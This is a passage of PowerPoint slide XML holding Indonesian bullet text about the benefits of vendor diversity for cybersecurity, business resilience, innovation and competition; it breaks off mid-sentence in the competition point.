          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Keragaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> vendor sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menawarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manfaat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>inovasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persaingan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-Mengandalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> vendor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>solusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menciptakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Seluruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berisiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditemukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> vendor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Keragaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> vendor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperkenalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempersulit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengeksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Ketahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-Keragaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> vendor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penguncian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> vendor dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bergantung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> vendor. Jika vendor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berhenti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bangkrut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengalami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gangguan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>signifikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alternatif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelangsungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Inovasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-Berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> vendor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membawa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perspektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, ide, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Memanfaatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>solusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> vendor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghasilkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TI yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>inovatif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lincah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memposisikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beradaptasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tren</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sedang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkembang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Persaingan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-Keberagaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> vendor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendorong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persaingan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di pasar, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghasilkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dukungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
